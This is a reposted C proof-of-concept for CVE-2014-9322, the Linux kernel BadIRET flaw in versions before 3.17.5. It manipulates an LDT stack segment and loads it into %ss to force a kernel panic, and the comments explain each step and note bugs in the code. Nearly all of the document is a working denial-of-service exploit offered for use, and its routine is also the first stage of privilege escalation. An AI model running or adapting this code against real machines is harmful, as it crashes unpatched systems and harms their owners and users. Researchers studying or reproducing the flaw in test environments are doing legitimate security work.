
cve-2014-9322 Linux Kernel D.O.S POC

D 23 February 2015     H 20:44     A Emeric Nasi     C 0 messages


  1. /* ----------------------------------------------------------------------------------------------------
  2.  * cve-2014-9322_poc.c
  3.  *
  4.  * arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
  5.  * properly handle faults associated with the Stack Segment (SS) segment
  6.  * register, which allows local users to gain privileges by triggering an IRET
  7.  * instruction that leads to access to a GS Base address from the wrong space.
  8.  *
  9.  * This is a POC to reproduce the vulnerability. No exploitation here, just a simple kernel panic.
  10.  *
  11.  * I take no credit for writing this poc, I just implemented the first part of Rafal Wojtczuk's article (this guy is a genius!)
  12.  * More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
  13.  *
  14.  *
  15.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c -lpthread
  16.  *
  17.  * Emeric Nasi - www.sevagas.com
  18.  *-----------------------------------------------------------------------------------------------------*/
  19.  
  20. // Only works on x86_64 platform
  21. #ifdef __x86_64__
  22.  
  23. /* ----------------------- Includes ----------------------------*/
  24. #define _GNU_SOURCE
  25. #include <stdio.h>
  26. #include <stdlib.h>
  27. #include <time.h>
  28. #include <string.h>
  29. #include <unistd.h>
  30. #include <fcntl.h>
  31. #include <sys/syscall.h>
  32. #include <sys/mman.h>
  33. #include <asm/ldt.h>
  34. #include <pthread.h>
  35. #include <sys/time.h>
  36. #include <inttypes.h>
  37. #include <stdbool.h>
  38. #include <errno.h>
  39. #include <sys/user.h>
  40.  
  41.  
  42.  
  43. /* ----------------------- definitions ----------------------------*/
  44.  
  45.  
  46. #define TARGET_KERNEL_MIN "3.0.0"
  47. #define TARGET_KERNEL_MAX "3.17.4"
  48. #define EXPLOIT_NAME "cve-2014-9322"
  49. #define EXPLOIT_TYPE DOS
  50.  
  51.  
  52. #define FALSE_SS_BASE 0x10000UL
  53. #define MAP_SIZE 0x10000
  54.  
  55.  
  56. /* ----------------------- Global variables ----------------------------*/
  57.  
  58.  
/* LDT descriptor shared between segManipulatorThread() (which fills it in and
 * installs it twice, the second time with seg_not_present = 1) and main()
 * (which only loads the matching selector into %ss). Not protected by any
 * lock; the two threads are ordered by sleep() calls only. */
struct user_desc new_stack_segment;
  60.  
  61.  
  62. /* ----------------------- functions ----------------------------*/
  63.  
  64.  
/**
 * Installs (or overwrites) one Local Descriptor Table entry via modify_ldt(2).
 *
 * @param desc  Descriptor to write; desc->entry_number selects the LDT slot.
 * @param name  Human-readable label, used only in the failure message.
 * @return true when modify_ldt returned 0, false otherwise. Failures are
 *         reported on stdout together with strerror(errno).
 */
static bool add_ldt(struct user_desc *desc, const char *name)
{
    long rc = syscall(SYS_modify_ldt, 1, desc, sizeof *desc);

    if (rc != 0) {
        /* Report the caller's label first, then the kernel's reason. */
        printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
        printf("modify_ldt failed, %s\n", strerror(errno));
        return false;
    }

    return true;
}
  81.  
  82.  
/* Handshake flag: set to 1 by segManipulatorThread() right after it re-installs
 * the LDT entry with seg_not_present = 1, and polled by main() in a busy loop.
 * It is a plain int shared between two threads with no volatile/_Atomic
 * qualifier, i.e. a data race under the C11 memory model; the header's compile
 * line uses no -O level, and an optimising build could hoist the load out of
 * the polling loop. */
int FLAG = 0;
  84.  
/**
 * Worker thread: installs a 32-bit stack segment in the LDT, waits for main()
 * to switch %ss to it, then re-installs the same slot marked not-present so
 * that a later return to user mode through that SS faults — the SS-fault
 * condition described in the file header.
 *
 * @param none  Unused pthread argument.
 * @return NULL. On a kernel in the affected range the process is not
 *         expected to reach the end of the final sleep.
 */
void * segManipulatorThread(void * none)
{
    /* LDT slot 0x12: selector 0x97 = (0x12 << 3) | TI=1 (LDT) | RPL=3 is the
     * value main() loads into %ss. */
    new_stack_segment.entry_number = 0x12;
    /* Same address main() maps with MAP_FIXED (FALSE_SS_BASE). */
    new_stack_segment.base_addr = 0x10000;
    new_stack_segment.limit = 0xffff;
    new_stack_segment.seg_32bit = 1;
    new_stack_segment.contents = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
    new_stack_segment.read_exec_only = 0;
    new_stack_segment.limit_in_pages = 0;
    new_stack_segment.seg_not_present = 0;
    new_stack_segment.useable = 0;
    new_stack_segment.lm = 0;

    // Create a new stack segment. The return value is ignored: a failure is
    // only printed by add_ldt, and main() still goes on to load %ss.
    add_ldt(&new_stack_segment, "newSS");

    // Wait for main thread to use new stack segment. This is a fixed delay,
    // not a handshake: main() sleeps 1s before loading %ss, this thread 3s.
    sleep(3);

    // Invalidate stack segment: overwrite the same LDT slot with P=0.
    new_stack_segment.seg_not_present = 1;
    add_ldt(&new_stack_segment, "newSS disable");
    // Release main()'s polling loop (plain int, no atomic — see FLAG).
    FLAG = 1;
    sleep(15);

    return NULL;
}
  112.  
/**
 * DOS poc for cve_2014_9322 vulnerability
 *
 * Maps the memory the fake stack segment points at, starts the LDT worker
 * thread, loads the worker's selector into %ss, then spins until the worker
 * has marked that segment not-present. On a kernel in the affected range
 * (TARGET_KERNEL_MIN..TARGET_KERNEL_MAX) the process is not expected to
 * return normally; on a fixed kernel it simply exits after the sleeps.
 *
 * @return 0 on the normal path, -1 if the fixed mapping fails. Note the
 *         pthread_create failure path returns `false`, i.e. 0, which reports
 *         success to the shell — inconsistent with the -1 used above it.
 */
int main()
{

    pthread_t thread1;
    uint8_t *code;

    printf("[cve_2014_9322]: Preparing to exploit.\n");

    // map area for false SS: MAP_FIXED at FALSE_SS_BASE (0x10000), the base
    // address segManipulatorThread writes into the LDT entry.
    // NOTE(review): 0x10000 is a commonly used default for vm.mmap_min_addr;
    // a stricter setting makes this mmap fail and the program exits here.
    code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
    if (code != (uint8_t *) FALSE_SS_BASE)
    {
        fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
        return -1;
    }

    printf("[cve_2014_9322]: Panic!\n");
    if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0)
    {
        perror("[cve_2014_9322 error]: pthread_create");
        return false; /* == 0: exit status reads as success despite the error */
    }

    // Wait for segManipulatorThread to create new stack segment
    // (fixed 1s delay; the worker only re-installs the entry after 3s).
    sleep(1);

    // Set stack segment to newly created one in segManipulatorThread:
    // 0x97 = LDT entry 0x12 (<<3) | TI=1 | RPL=3.
    asm volatile ("mov %0, %%ss;"
    :
    :"r" (0x97)
    );

    // Poll until the worker has flagged the segment not-present. FLAG is a
    // plain int (no volatile/_Atomic); see its declaration for the caveat.
    while(FLAG == 0){};
    sleep(4);

    return 0;
}
  153.  
  154.  
  155. #endif // __x86_64__
  156.  
  157.  


